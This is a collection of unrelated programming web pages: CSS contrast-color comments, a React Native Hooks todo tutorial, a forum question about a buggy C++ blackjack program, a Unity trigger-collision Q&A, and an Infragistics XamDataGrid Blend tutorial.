Unfortunately it requires a pow() function, which JavaScript has but CSS does not, so an accurate emulation of this using calc() won't work. This w3c document correctly shows that the RGB values must be linearized. The previous document you linked mentions "This algorithm is taken from a formula for converting RGB values to YIQ values" without explaining that YIQ color assumes the gamma is already linear.

And according to caniuse.com, var() is still not an option for IE11, which I'm discovering by angry backlash from various clients, still in use…

Great idea! How could we translate this to SCSS? This would get around the IE11 compatibility issue.

I actually later found Bootstrap's YIQ function at. I guess it's the same sort of thing?

It's the same idea, but unfortunately mathematically incorrect

Lu that was my concern. Would be great if we could override the function to make it work properly.

@Glenn This pen contains the correct math, also a copy of Bootstrap's yiq() for comparison. Watch out though, this code depends on a Sass pow() function. I'm using mathsass to provide one, via a Pen dependency (see the settings). This library is good but runs in SassScript so it's slow. Ideal would be to plug in some JavaScript math functions using Sass' functions Node API. I have a simple set of these that I could put in a Gist if you're interested.

Wow thanks for that Lu. I'm definitely interested. I think whatever the solution is it'll need to be easy to plug in to a new project otherwise my colleagues won't use it – they're not as interested in this stuff as I am.

Really great job! Unfortunately, MS Edge doesn't like calc() with css variables for now :/ Have to wait to use it in production.

Great job, except for one thing: your color picker sliders don't have accessible colored text to indicate the slider's value!
So if you make the quaternary color (which is used for the background of the color picker) very light, you won’t be able to see the actual numeric values of the sliders. I’m trying this in Chrome, so it’s possible other browsers do things differently; but you might want to consider putting a dark backdrop behind the sliders if you can’t control the color of their indicator text.
https://css-tricks.com/css-variables-calc-rgb-enforcing-high-contrast-colors/
React Hooks Basics — Building a React Native App with React Hooks

Aman Mittal — March 19, 2019

React 16.8 welcomed the dawn of Hooks. This new addition is both a new concept and a pragmatic approach that helps you use state and lifecycle-method behavior in functional React components, that is, without writing a class. The intention behind implementing this new feature in the React ecosystem is to benefit the whole community. Whether you are a developer with a front-end role or write mobile apps using React Native, chances are that you are going to come across Hooks often enough in your working environment. Of course, you do not have to use them. You can still write class components; they are not going anywhere yet. However, I personally like to think it is an important part of being a developer who uses something like React in our work/day-job/side-hustle projects to keep up to date with these new features.

Following in the footsteps of ReactJS, the React Native community recently announced that they will be adding support for Hooks shortly in the upcoming version 0.59. I have been waiting for them to officially make this announcement before I publish this tutorial, only to spike up your interest in Hooks. In this tutorial, I will walk you through the steps of using Hooks in a React Native application by building a small demo app, and we will understand the most common Hooks in detail before that. Moreover, I am going to briefly introduce you to the concept of flexbox and how it is significantly different in React Native than on the web.

Tldr;

- Requirements
- Setting up Crowdbotics Project
- Setup a React Native app
- What are Hooks?
- Implementing Hooks in react native
- Building a Todo List App
- What is flexbox?
- Adding Hooks to the Todo List App
- Rendering the list
- Completing and Deleting an Item
- Conclusion

Requirements

In order to follow this tutorial, you are required to have the following installed on your dev machine:

- NodeJS above 8.x.x installed on your local machine
- Knowledge of how to run simple npm commands
- JavaScript/ES6 basics
- watchman, the file watcher, installed
- react-native-cli installed through npm

For a complete walkthrough on how you can set up a development environment for React Native, you can go through the official documentation here.

Setting up a Crowdbotics Project

In this section, you will be setting up a Crowdbotics project that has a React Native pre-defined template with stable and latest dependencies for you to leverage. However, at the time of writing this tutorial, the template does not use React Native version 0.59. So instead of going into too much hassle about upgrading this React Native app, I will be walking you through creating a new React Native project in the next section. To follow along, setting up a new project using the Crowdbotics app builder service is easy. Visit the app.crowdbotics.com dashboard. Once you are logged in, choose Create a new application. On the Create an Application page, choose the React Native template under Mobile App.

Setup a React Native App

Once you have installed react-native-cli, you can begin by generating a React Native project. Run the below command to initialize a new React Native project. Also, note that you can name your React Native app anything.

react-native init RNHooksTODOAPP

Using this command, a new project folder will be generated; traverse inside it and you will be welcomed by a slightly different file system (a new file that you might not have seen before is metro.config.js, which you can ignore for now). Also, note that RNHooksTODOAPP is the project and directory name, so in its place you can enter anything.
For more information on the current release candidate of React Native, you can visit their Github project.

facebook/react-native
_A framework for building native apps with React. Contribute to facebook/react-native development by creating an account…_github.com

To run the mobile application in an iOS/Android simulator you can run the same old CLI commands like react-native run-ios or run-android.

What are Hooks?

Hooks in React have been available since version 16.7.0-alpha. They are functions that allow you to use React state and a component's lifecycle methods in a functional component. Hooks do not work with classes. If you are familiar with React, you know that a functional component used to be called a functional stateless component, since previously only a class component allowed you to have local state. Not any more. Using Hooks, you do not have to refactor a class component in React or React Native into a functional component only because you want to introduce local state or lifecycle methods in that component. In other words, Hooks allow us to write apps in React with function components. React provides a few built-in Hooks like useState and useEffect. You can also create your own Hooks to re-use stateful behavior between different components.

Implementing Hooks in React Native

In the example below, let us take a look at how you will manage the local state of a component by using Hooks. Open up the App.js file and paste this code.
import React, { useState } from 'react';
import { StyleSheet, Text, View, Button } from 'react-native';

export default function App() {
  const [count, setCount] = useState(0);

  return (
    <View style={styles.container}>
      <Text>You clicked {count} times.</Text>
      <Button onPress={() => setCount(count + 1)} title="Click me" />
    </View>
  );
}

const styles = StyleSheet.create({
  container: {
    flex: 1,
    justifyContent: 'center',
    alignItems: 'center',
    backgroundColor: '#F5FCFF'
  },
  welcome: {
    fontSize: 20,
    textAlign: 'center',
    margin: 10
  },
  instructions: {
    textAlign: 'center',
    color: '#333333',
    marginBottom: 5
  }
});

We will start by writing a basic old-fashioned counter example to understand the concept of using Hooks. In the above code snippet, you start by importing the usual suspects along with useState from the react library. This built-in hook allows you to add local state to functional components. Notice that we are writing a functional component: export default function App(). Instead of traditionally writing a class component, we are defining a normal function.

This App function has state in the form of const [count, setCount] = useState(0). React preserves this state between all the re-rendering happening. useState here returns a pair of values. The first one is count, the current value; the second one is a function that lets you update that value. You can call the setCount function from an event handler or from somewhere else. It is similar to this.setState in a class component. Above, we are using the function inside the Button component: setCount(count + 1).

The useState(0) hook also takes a single argument that represents the initial state. We are defining the initial state as 0. This is the value from which our counter will start. To see this in action, open two terminal windows after traversing inside the project directory.

# first terminal window, run
npm start

# second window, run
react-native run-ios

Once the build files are created, the simulator will show you a similar result like below.
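The useState contract shown above - a current value plus an updater, with the value preserved between renders - can be modeled with a tiny closure in plain JavaScript. This is only an illustration of the API shape, not React's actual implementation, and makeUseState is a made-up name:

```javascript
// Minimal model of useState's contract: a current value plus an
// updater, with the value preserved across calls. React's real hook
// additionally schedules a re-render; this sketch just stores state.
function makeUseState(initial) {
  let state = initial;
  const setState = next => { state = next; };
  const getState = () => state;
  return [getState, setState];
}

const [getCount, setCount] = makeUseState(0);
setCount(getCount() + 1); // like onPress={() => setCount(count + 1)}
setCount(getCount() + 1);
if (getCount() !== 2) throw new Error("state was not preserved");
```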
If you play around a bit and hit the button Click me, you will see the counter's value increase. As you know by now, the App component is nothing but a function that has state. You can even refactor it like below by introducing another function to handle the Button click event, and it will still work.

export default function App() {
  const [count, setCount] = useState(0);

  function buttonClickHandler() {
    setCount(count + 1);
  }

  return (
    <View style={styles.container}>
      <Text>You clicked {count} times.</Text>
      <Button onPress={buttonClickHandler} title="Click me" />
    </View>
  );
}

Building a Todo List app with Hooks

In this section, you are going to build a Todo List application using the React Native framework and Hooks. I personally love building Todo list applications when getting hands-on experience over a new programming concept or approach. We have already created a new project in the last section when we learned about Hooks. Let us continue from there. Open up App.js and modify it with the following code.

import React from 'react';
import {
  StyleSheet,
  Text,
  View,
  TouchableOpacity,
  TextInput
} from 'react-native';

export default function App() {
  return (
    <View style={styles.container}>
      <Text style={styles.header}>Todo List</Text>
      <View style={styles.textInputContainer}>
        <TextInput
          style={styles.textInput}
          multiline={true}
        />
      </View>
    </View>
  );
}

const styles = StyleSheet.create({
  // container, header, textInputContainer and textInput styles go here
});

We need a text input field to add items to our list. For that, TextInput is imported from react-native. For demonstration purposes, I am keeping the styles simple, especially the background color. If you want to make the UI look good, go ahead. In the above code, there is a header called Todo List which has corresponding header styles defined using the StyleSheet.create object. Also, take notice of the View which uses justifyContent with a value of flex-start.

What is flexbox?

Creating a UI in a React Native app heavily depends on styling with flexbox. Even if you decide to use a third party library kit such as nativebase or react-native-elements, their styling is based on flexbox too.
The flexbox layout starts by creating a flex container with an element of display: flex. If you are using flexbox for the web you will have to define this display property. In React Native, it is automatically defined for you. The flex container can have its own children across two axes: the main axis and the cross axis. They are perpendicular to each other. These axes can be changed with the flexDirection property. On the web, by default, it is a row. In React Native, by default, it is a column. To align an element along the horizontal axis (the cross axis) in React Native, you have to specify flexDirection: 'row' in the StyleSheet object. We have done the same in the above code for the View that contains the TextInput field.

Flexbox is an algorithm that is designed to provide a consistent layout on different screen sizes. You will normally use a combination of flexDirection, alignItems, and justifyContent to achieve the right layout. Adding justifyContent to a component's style determines the distribution of children elements along the main axis. alignItems determines the distribution of children elements along the cross axis.

Back to our app. Right now, if you run it in a simulator, it will look like below. Let us add an icon to represent a button to add items to the todo list. Go to the terminal window right now and install react-native-vector-icons.

npm install -S react-native-vector-icons

# Also link it
react-native link react-native-vector-icons

Now go back to the App.js file. We have already imported TouchableOpacity from react-native core. Now let us import Icon from react-native-vector-icons.

import {
  StyleSheet,
  Text,
  View,
  TouchableOpacity,
  TextInput
} from 'react-native';
import Icon from 'react-native-vector-icons/Feather';

The next step is to add the Icon element inside TouchableOpacity next to the TextInput. This means the plus icon to add an item to the list must be on the same line or axis as the text input field.
TouchableOpacity makes the icon clickable and can have an event listener function (which we will add later) to run the business logic for adding an item to the list.

<View style={styles.textInputContainer}>
  <TextInput
    style={styles.textInput}
    multiline={true}
  />
  <TouchableOpacity>
    <Icon name="plus" size={30} color="blue" style={{ marginLeft: 15 }} />
  </TouchableOpacity>
</View>

Now if you go back to the simulator you will have the following screen.

Adding Hooks to the App

In this section, you are going to add local state to the component using Hooks. We will start by initializing the local state for the App component with the new hooks syntax. For that, you have to require useState from react core. Also, note that the initial state is passed as an argument to the useState() function.

import React, { useState } from 'react';

// ...

export default function App() {
  const [value, setValue] = useState('');
  const [todos, setTodos] = useState([]);

  addTodo = () => {
    if (value.length > 0) {
      setTodos([...todos, { text: value, key: Date.now(), checked: false }]);
      setValue('');
    }
  };

  // ...
}

The first value is the value of the TextInput, and it is initially passed as an empty string. In the next line, todos is declared as an empty array that will later contain multiple values. setValue is responsible for updating value as the user types into the TextInput, and for resetting it to an empty string once the value has been added to the todos array. setTodos is responsible for updating the state.

The addTodo function we define is a handler that checks that the TextInput field is not empty when the user taps the plus icon; it then adds the value from state to todos, generating a unique key at the same time so that each todo item can be retrieved from the todos array and displayed in the list. The initial value for checked is false, since no todo item can be marked as completed by default, that is, when adding it to the list.
Here is the complete code for App.js after adding state through Hooks.

import React, { useState } from 'react';
import {
  StyleSheet,
  Text,
  View,
  TouchableOpacity,
  TextInput
} from 'react-native';
import Icon from 'react-native-vector-icons/Feather';

export default function App() {
  const [value, setValue] = useState('');
  const [todos, setTodos] = useState([]);

  addTodo = () => {
    if (value.length > 0) {
      setTodos([...todos, { text: value, key: Date.now(), checked: false }]);
      setValue('');
    }
  };

  return (
    <View style={styles.container}>
      <Text style={styles.header}>Todo List</Text>
      <View style={styles.textInputContainer}>
        <TextInput
          style={styles.textInput}
          multiline={true}
          placeholder="What do you want to do today?"
          placeholderTextColor="#abbabb"
          value={value}
          onChangeText={value => setValue(value)}
        />
        <TouchableOpacity onPress={() => addTodo()}>
          <Icon name="plus" size={30} color="blue" style={{ marginLeft: 15 }} />
        </TouchableOpacity>
      </View>
    </View>
  );
}

const styles = StyleSheet.create({
  // container, header, textInputContainer and textInput styles go here
});

Rendering the List

You are going to create a new component that will be responsible for displaying each task that a user adds. Create a new file called TodoList.js and add the following code to the file.

import React from 'react';
import { StyleSheet, TouchableOpacity, View, Text } from 'react-native';
import Icon from 'react-native-vector-icons/Feather';

export default function TodoList(props) {
  return (
    <View style={styles.listContainer}>
      <Icon name="square" size={30} color="black" style={{ marginLeft: 15 }} />
      <Text style={styles.listItem}>{props.text}</Text>
    </View>
  );
}

const styles = StyleSheet.create({
  // listContainer and listItem styles go here
});

Now let us import this component in App.js to render todo items when we add them by clicking the plus sign button. Also, you are now required to import ScrollView in the App component from react native core.

import {
  StyleSheet,
  Text,
  View,
  TouchableOpacity,
  TextInput,
  ScrollView
} from 'react-native';

// ...

import TodoList from './TodoList';

// ...

return (
  <View style={styles.container}>
    {/* ... */}
    <ScrollView style={{ width: '100%' }}>
      {todos.map(item => (
        <TodoList text={item.text} key={item.key} />
      ))}
    </ScrollView>
  </View>
);

The ScrollView is a component that renders all its children at once. It is a good choice when you are not rendering a large amount of data, or data coming from a third party API. Now, enter a new task (like below) and try adding it to the todo list.

Completing and Deleting an Item

This is the last section to complete our application. We need two handler functions to implement the functionality of marking a todo list item as complete and of deleting a todo list item. Define two functions like below, after addTodo.

checkTodo = id => {
  setTodos(
    todos.map(todo => {
      if (todo.key === id) todo.checked = !todo.checked;
      return todo;
    })
  );
};

deleteTodo = id => {
  setTodos(
    todos.filter(todo => {
      if (todo.key !== id) return true;
    })
  );
};

The first function, checkTodo, uses map to traverse the complete todos array, and then toggles only the item that the user tapped, by matching its key (look at the addTodo function - we defined a key when adding an item to the todo list). The deleteTodo function uses filter to remove an item from the list. To make this work, we need to pass both of these functions to the TodoList component.

// App.js
<ScrollView style={{ width: '100%' }}>
  {todos.map(item => (
    <TodoList
      text={item.text}
      key={item.key}
      checked={item.checked}
      setChecked={() => checkTodo(item.key)}
      deleteTodo={() => deleteTodo(item.key)}
    />
  ))}
</ScrollView>

Now open TodoList.js and use these new props.

import React from 'react';
import { StyleSheet, View, Text } from 'react-native';
import Icon from 'react-native-vector-icons/Feather';

export default function TodoList(props) {
  return (
    <View style={styles.listContainer}>
      <Icon
        name={props.checked ?
'check' : 'square'}
        size={30}
        color="black"
        style={{ marginLeft: 15 }}
        onPress={props.setChecked}
      />
      <View>
        {props.checked && <View style={styles.verticalLine} />}
        <Text style={styles.listItem}>{props.text}</Text>
      </View>
    </View>
  );
}

const styles = StyleSheet.create({
  // listContainer and listItem styles go here
  verticalLine: {
    borderBottomColor: 'green',
    borderBottomWidth: 4,
    marginLeft: 10,
    width: '100%',
    position: 'absolute',
    marginTop: 15,
    fontWeight: 'bold'
  }
});

Now run the app and see it in action.

Conclusion

This completes our tutorial. I hope this tutorial helps you understand the basics of React Hooks and how to implement them with your favorite mobile app development framework, React Native. You can extend this demo application by adding AsyncStorage or a cloud database provider and making this application real time. Also, do not forget to enhance the UI to your liking. To read more about React Hooks, check out the official Overview page here. The complete code for this tutorial is available in the Github repository below.

amandeepmittal/RNHooksTODOAPP

Originally published at Crowdbotics
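As a footnote, the checkTodo/deleteTodo updates used in this tutorial can be exercised as plain JavaScript outside React, here rewritten in a non-mutating style over a hand-made sample array (the item texts are invented for the sketch):

```javascript
// Plain-array version of the checkTodo / deleteTodo state updates.
let todos = [
  { text: 'buy milk', key: 1, checked: false },
  { text: 'write post', key: 2, checked: false }
];

// Toggle the item whose key matches, leaving the others untouched.
const checkTodo = id =>
  todos.map(todo =>
    todo.key === id ? { ...todo, checked: !todo.checked } : todo
  );

// Keep every item except the one whose key matches.
const deleteTodo = id => todos.filter(todo => todo.key !== id);

todos = checkTodo(1);
if (todos[0].checked !== true) throw new Error('toggle failed');

todos = deleteTodo(2);
if (todos.length !== 1 || todos[0].key !== 1) throw new Error('delete failed');
```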
https://amanhimself.dev/build-a-react-native-app-with-react-hooks/
I don't know why, but this program I wrote is having a problem: it has trouble converting an Ace from 11 to 1 when the players have more than 21. If you could look it over, I would appreciate it.

```cpp
#include <iostream>
#include <ctime>
using namespace std;

double Card = 0;
char cardA;
int YN = 1;
bool Ace = false;
int Play = 1;
double pHand = 0;
double dHand = 0;
double Chips = 1000;
double bet = 0;
int Win = 0;

void cardT()
{
    int KQJ = 0;
    if (Card == 11) { cout << "Dealer draws a Jack\n";  Card = 10; KQJ = 1; }
    if (Card == 12) { cout << "Dealer draws a Queen\n"; Card = 10; KQJ = 1; }
    if (Card == 13) { cout << "Dealer draws a King\n";  Card = 10; KQJ = 1; }
    if (Card == 1)  { cout << "Dealer draws an Ace\n";  Card = 11; Ace = true; KQJ = 1; }
    if (KQJ != 1) { cout << "Dealer draws a " << Card << endl; }
}

void dDraw()
{
    Card = (rand() % 13) + 1; // Dealer Draws
    cardT();
    dHand = dHand + Card;
    if ((dHand > 21) && (Ace = true)) { dHand = dHand - 10; Ace = false; }
    cout << "dealer has " << dHand << endl << endl;
}

void pDraw()
{
    Card = (rand() % 13) + 1; // Player Draws
    cardT();
    pHand = pHand + Card;
    if ((dHand > 21) && (Ace = true)) { pHand = pHand - 10; Ace = false; }
    cout << "player has " << pHand << endl << endl;
}

int main()
{
    cout << "Welcome to Blackjack. Would you like to play?\n";
    cout << " 1.Yes\n 2.No\n";
    cin >> Play;
    while (Play != 2)
    {
        cout << "You have $" << Chips << " in chips.\n";
        cout << "Place your bet\n";
        cin >> bet;
        while (Chips < bet)
        {
            cout << "Please enter fewer chips than you have.\n";
            cout << "Place your bet\n";
            cin >> bet;
        }
        srand(time(NULL));
        pDraw();
        dDraw();
        pDraw();
        dDraw();
        while (YN == 1)
        {
            if (pHand < 21)
            {
                cout << "Would you like another card?\n 1.Hit me \n 2.Stay \n";
                cin >> YN;
                cout << endl;
            }
            if (pHand == 21) { cout << "Winner! Winner! Chicken dinner!\n\n"; YN = 2; Win = 1; }
            if (pHand >= 22) { cout << "Player busts. Dealer wins\n\n"; pHand = 0; YN = 2; Win = 2; }
            if (YN == 1) { cout << "Very well\n"; pDraw(); }
            if ((YN != 1) && (pHand != 0) && (pHand != 21))
            {
                while (dHand <= 17) { dDraw(); }
                if (dHand == 21) { cout << "Dealer has BlackJack Dealer wins.\n\n"; Win = 2; }
                if ((dHand >= 22) && (dHand != 21)) { cout << "Dealer busts. Player wins\n\n"; dHand = 0; Win = 1; }
                if ((dHand != 0) && (pHand != 0) && (dHand != 21) && (pHand != 21))
                {
                    if (pHand < dHand)  { cout << "Dealer wins.\n\n"; Win = 2; }
                    if (pHand > dHand)  { cout << "Player wins.\n\n"; Win = 1; }
                    if (pHand == dHand) { cout << "Game ends in tie.\n\n"; }
                }
            }
        }
        if (Win == 1) { Chips = Chips + bet; }
        if (Win == 2) { Chips = Chips - bet; }
        cout << "You have $" << Chips << " in chips.\n";
        Ace = 0;
        Win = 0;
        dHand = 0;
        pHand = 0;
        YN = 1;
        cout << "Would you like to play again?\n 1.Yes\n 2.No\n";
        cin >> Play;
        if ((Chips <= 0) && (Play == 1))
        {
            Play = 2;
            cout << "Sorry, but you are out of chips.\n";
        }
    }
    cout << "Thank you for playing!\n";
    system("pause");
    return 0;
}
```

Lengthy, isn't it? :icon_eek:
https://www.daniweb.com/programming/software-development/threads/159464/blackjack-problem
So basically I want to be able to detect if my capsule collides with my sphere. Right now it just isn't working. Here is the script I place on the sphere:

```csharp
public GameObject ParticlePrefab;

void OnTriggerEnter(Collider col){
    Debug.Log("Hit");
    Destroy(col.gameObject);
    Instantiate(ParticlePrefab, transform.position, transform.rotation);
}
```

For some reason it never does any of this when the capsule collides with it. I have the capsule as a Rigidbody and a trigger, so I can't think of a reason why this won't work. Any help would be appreciated.

Answer by Infamous911 · Jul 26, 2011 at 07:43 PM

Ok the problem was that I never actually applied the rigidbody properly. Thanks for the help!

Answer by Giometric · Jul 25, 2011 at 08:49 PM

Is the Sphere that this script is on also a trigger?

edit: actually the example code for C# does have some stuff not present in your script.

```csharp
using UnityEngine;
using System.Collections;

public class example : MonoBehaviour {
    void OnTriggerEnter(Collider other) {
        Destroy(other.gameObject);
    }
}
```

I'm not a C# user myself, but it might just need those first few extra lines, and also the "public class example" part, before it will work at all. I think as long as one of them is a trigger, OnTriggerEnter() gets called on both.

Yeah, I remembered that right after posting hehe, quickly edited with a better answer :P

Yes I have that, I just edited out all of the other stuff so that you could see the script that was associated with the problem.

Answer by Infamous911 · Jul 25, 2011 at 08:52 PM

No, but I tried that and it doesn't change anything.

Answer by Giometric · Jul 25, 2011 at 09:53 PM

Ok I went ahead and replicated the scene you described, and it seems to be working fine.
This is what the entire script I have looks like:

```csharp
using UnityEngine;
using System.Collections;

public class test2 : MonoBehaviour {
    public GameObject ParticlePrefab;

    void OnTriggerEnter(Collider col){
        Debug.Log("Hit");
        Destroy(col.gameObject);
        //Instantiate(ParticlePrefab, transform.position, transform.rotation);
    }
}
```

Though as you can see I commented out the Instantiate part, the Debug.Log part is definitely working. So I'm not sure what's going on with yours. My scene is using a simple Unity sphere and capsule, the sphere has the script on it, and the capsule has a rigidbody applied and nothing else. Are you using a character controller on your capsule? Can you show me how you're applying the Rigidbody? Maybe that has something to do with it.
https://answers.unity.com/questions/148323/collision-problem-in-c.html
XamDataGrid 101, Part 1 - Blend-Savvy Overview

[Infragistics] Curtis Taylor / Monday, August 16, 2010

The premier control of the WPF NetAdvantage suite is definitely the XamDataGrid. The Infragistics data grid trumps all similar types of controls everywhere. Not only do I get paid to say that, but as a user of our controls I have found the XamDataGrid to be fast, highly customizable, and fast (which is worth repeating). <smile> Since the grid is highly customizable, there are many parts of the object model you can approach for styling and formatting. I am going to cover some of the more popular ways to customize the grid.

Creating a Sample Project

Clearly, the coolest thing about the XamDataGrid is how intelligently it will format data for you. Simply bind a collection to the grid and it will extract data fields from properties and assign editors with default formatting. To illustrate this point, let's create a WPF 4.0 project in Expression Blend with sample data and bind the sample data to the XamDataGrid.

Create a new WPF Application project in Expression Blend 4. For this project it is important to make sure that you choose .NET version 4.0. For part of this project we will be using the XamColorPicker control, which is one of the new 4.0 controls in NetAdvantage. I've named my test project XDG101.

Next, add references to the NetAdvantage for WPF assemblies. Right-click on the References folder in the Project panel. In Blend you will need to navigate to the folder which contains the DLLs for the assemblies. Navigate to the Program Files folder and locate the Infragistics\NetAdvantage 2010.2 folder. Within this folder there are two folders we must refer to: both the WPF and the WPFCommon folders contain DLLs we will be using. Note that the WPFCommon folder is there to facilitate common DLLs shared with the WPF Data Visualization version of NetAdvantage. In the WPFCommon\Bin folder, add "InfragisticsWPF4.v10.2.dll" to the project References.
Return to the Add References dialog and add the following DLLs from the WPF\CLR4.0\Bin folder:

InfragisticsWPF4.Controls.Editors.XamColorPicker.v10.2.dll
InfragisticsWPF4.DataPresenter.v10.2.dll
InfragisticsWPF4.Editors.v10.2.dll

Now, from the Data panel in Blend, add data to the project to be used at run time. This time I am adding the data to "This document", which will add the instantiation of the data source to the main window rather than to the application. On adding sample data, by default a Collection is added, composed of a class that contains two properties. The first property should be a string with Lorem ipsum formatting. Leave this property as is, except click on the name of the property to rename it to 'ProductName'. The second default property should already be a Boolean type. Rename this property to 'ForSale'.

Next click on the Plus icon button to the right of the Collection in the Data panel to add another property. Clicking on the button will add a default String property. Rename the property 'Icon'. To the right of the property you can customize the type and formatting. Change the newly added property to be Type Image. On changing to type Image, leave the Location field blank. This will cause Blend to add sample images to the project for you. With Location you can add a folder of your own images to the data. Next add a property named ID of Type Number of Length 4. Then add a property named ColorKey of Type String, Format Colors. Finally, add a property named Price of Type Number and Length 2.

Next we will add an instance of the XamDataGrid to the main layout of the Main Window. You can quickly locate the XamDataGrid by using the search field in the Assets panel. Double-click on the XamDataGrid in the Assets list or drag it into the design space for the window. Blend will position the element on adding it by setting certain Layout properties.
To make the XamDataGrid fill the entire Window, reset all properties in the Layout category of the Properties panel. Reset is an option in the Advanced Layout menu which will clear a property to its default setting. The Advanced Layout menu is accessed by clicking on the rectangle to the right of every property.

To assign the data to the XamDataGrid, select the control in the Objects and Timeline panel and locate the DataSource property in the Content category of the Properties panel. Access the DataSource Advanced Layout menu and choose the Data Binding option. In the subsequent Create Data Binding dialog we will assign the Collection to the binding expression. This is located in the Data Field tab. After selecting the Collection and closing the dialog, you will find the XamDataGrid populated with the data we created.

Data Formatting

Next I will illustrate a few things you can do to customize the formatting for the data. First of all, notice how the labels for each header match the property names. We will want to override the text for the labels. We will want to override the width and height of the icon. We will move the icon to be the first field in the grid. We will remove the floating decimal numbers on the ID field. We'll format the Price number field as currency. And finally, we'll assign the XamColorPicker element to be the editor for the ColorKey field.

To override how the fields are generated, we will need to disable the XamDataGrid AutoGenerateFields feature. This property is located in the FieldLayoutSettings property on the data grid. In the Properties panel locate FieldLayoutSettings (it should be in the Behavior category). Clicking on the New button next to this property will add an instance of this property which we can customize. Blend will expand to show the properties in FieldLayoutSettings. Here locate and uncheck the AutoGenerateFields property.
Next we will need to add a custom FieldLayout, which will define how each field will appear in the XamDataGrid. In Properties locate the FieldLayouts (Collection) property (it should be in the Miscellaneous category). Clicking on the button with the ellipsis will display a dialog which will prompt us to add an instance of a FieldLayout. In the FieldLayout Collection Editor dialog, add one instance of a FieldLayout. In the properties for the added FieldLayout you will find a Fields Collection property. Click on the Fields Collection button to bring up the Field Collection Editor dialog. Here we will be adding a Field for each property in our data source.

Clicking on the 'Add Another Item' button will invoke the Select Object dialog. Here you can choose between adding a Field or an Unbound Field. As the name implies, Unbound Fields are for adding Fields that are not derived directly from a property of the data source. Add a Field object. A Field will show up in the Field Collection Editor dialog, with properties for that Field appearing on the right of the dialog. Here is where we can make the first field point to the Icon property. To do this we must assign the Field Name property to match the name of the property from the bound data. Type the word 'Icon' in the Name field. We don't need a Label for the icon image, so type a space in the Label field. Finally, to limit the width and height of the icon, type 30 in both the Width and Height fields.

To add and customize the next field, we will need to "add another item" in the Field Collection Editor. If you hit the OK button and closed the editor, simply click on the Fields ellipsis button again in the FieldLayout Collection Editor dialog. Add a new Field. The next field we will assign the ProductName property to. Since ProductName needs to be separated by a space to be more human friendly, assign 'ProductName' to the Field Name property and 'Product Name' to the Label property. Also set the Width of this property to '160'.
Add a third Field and set the following properties:

Name: 'ForSale'
Label: 'For Sale'
Width: '70'

Add a fourth Field with the following properties:

Name: 'ID'
Label: 'ID'
Width: '60'

Add a fifth Field with the following properties:

Name: 'ColorKey'
Label: 'Color Key'

Finally, add the last Field with the following properties:

Name: 'Price'
Label: 'Price'
Width: '70'

Press OK on both dialogs to close them both. Build or run the project and you will see the grid update with the new field layout. You can inspect the XAML Blend generated for us in the XAML editor.

Editor Formatting

To finish the formatting, we will need to add a few styles. To create styles with Expression Blend, you need to have an instance of the type of object you wish to style. This is problematic when the object you wish to style exists in a context which Blend does not provide access to. For example, the XamDataGrid instantiates XamEditor derivations for each field type. Since the instance is implicitly assigned, Blend will not allow us to create a style for one of these editors, since there is no explicit instance Blend can reference. To work around this you can either create the style in the XAML text editor, or temporarily add an instance of the type of editor you wish to style, create the style for the editor, remove the temporary instance of the editor, and then assign the style to the XamDataGrid Field. We will do the latter.

Make sure the LayoutRoot in the Objects and Timeline panel is selected before proceeding. In the Assets search field, type XamNumericEditor and double-click on the editor control to add it to the Window. With the temporary XamNumericEditor selected in Objects and Timeline, select the Object -> Edit Style -> Create Empty menu item from the top menu bar. In the subsequent Create Style Resource dialog, name the style 'NumericEditorIDStyle' and make sure to add it to the current document. Blend will place the designer into Style editing mode.
In this mode, any change to a property will become a Setter in the current style. To format the XamNumericEditor to not show numbers after the decimal point, we will want to assign a mask to the Mask property. Type 'nnnnn' in the Mask property. Click on the Return Scope button to exit Style editing mode.

Now that we have our style, we don't need the XamNumericEditor. Delete the XamNumericEditor element in the Objects and Timeline panel. However, we still have the style, which was added to the Resource Dictionary of the Window. To apply the style, we will need to assign it to the Field.Settings.EditorStyle property for the ID field. To return to this editor, click on the XamDataGrid FieldLayouts (Collection) property ellipsis button, click on the Fields (Collection) ellipsis button in the FieldLayout Collection Editor dialog, select the fourth Field in the Field Collection Editor dialog, and click on the New button next to the Settings property for the ID field. Settings will expand to show additional settings properties for that field. Locate the EditorStyle property. In the Advanced Options for EditorStyle, the Local Resources option is disabled (with this version; this may be fixed in a future version), so instead we will add a custom expression. In the Custom Expression popup dialog add the following text:

{StaticResource NumericEditorIDStyle}

This should apply the formatting to the ID field immediately.

To apply currency formatting to the Price field, we simply need to change the Editor Type from XamNumericEditor to XamCurrencyEditor. This change will be made in similar fashion to the ID field, except we will not need a style. Before we can do this, we will need a reference to the mscorlib assembly namespace. The following instruction is the only one where you must switch to the XAML editor.
Add the following text to the Window tag in the XAML editor:

xmlns:sys="clr-namespace:System;assembly=mscorlib"

As you might imagine, I now have two feature requests for Expression Blend: the ability to add references to namespaces, and the ability to add a Style to any type of object.

Return to the design editor, and open the Price Field properties by returning to the XamDataGrid FieldLayouts and Fields dialogs. The last Field is the Price Field. Click on the New button for Settings. In the Settings properties locate EditAsType and, in its Advanced Options, add the following text to the Custom Expression option:

{x:Type sys:Decimal}

Finally, add the following custom expression to the Advanced Options for the EditorType property:

{x:Type igEditors:XamCurrencyEditor}

The two added custom expressions generate the corresponding XAML on the Field's Settings. On pressing OK on the two dialogs, the Price field will update to display currency formatted for the current locale.

CellValuePresenter DataTemplate Override

The final change we will make to customize the formatting for the grid is the ColorKey field. Here we will create a CellValuePresenter Style which will contain a DataTemplate definition. The DataTemplate will bind the ColorKey value to the SelectedColor property on the XamColorPicker control. If you refer to the Infragistics documentation for creating a CellValuePresenter Style, you will find various XAML examples. Once again, this is another scenario where Blend cannot create the style from scratch without a little help, as the CellValuePresenter is another object which is created behind the scenes for every field. The CellValuePresenter defines how the value for each cell is presented within the UI of the XamDataGrid Record. Additionally, since the XamDataGrid will always instantiate instances of this control, this element is not added to the XML that Blend reads to know what to display in Assets.
To work around these few Blend limitations, we will briefly return to the XAML editor one last time. In the XAML editor, add the following text to the LayoutRoot content (before or after the XamDataGrid block of XAML):

<igDP:CellValuePresenter/>

On returning to the designer, a CellValuePresenter will appear in the Objects and Timeline. Now we have an object that we can style. Select the CellValuePresenter, then in the Object menu on the top menu bar select the 'Edit Style' -> 'Create Empty' option. Name the style 'ColorKeyCellStyle' in the Create Style Resource dialog.

